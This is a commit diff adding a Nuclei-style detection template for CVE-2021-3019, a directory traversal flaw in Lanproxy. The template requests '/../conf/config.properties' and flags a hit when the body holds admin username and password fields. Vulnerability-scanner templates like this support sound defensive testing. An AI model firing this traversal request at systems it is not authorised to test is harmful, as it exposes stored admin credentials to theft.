commit
66fc9f852c
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2021-3019
|
||||
|
||||
info:
|
||||
name: Lanproxy Directory Traversal
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
|
||||
# Refrence: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/../conf/config.properties"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "application/octet-stream"
|
||||
condition: and
|
||||
part: header
|
||||
- type: word
|
||||
words:
|
||||
- "config.admin.username"
|
||||
- "config.admin.password"
|
||||
condition: and
|
||||
part: body
|
Loading…
Reference in New Issue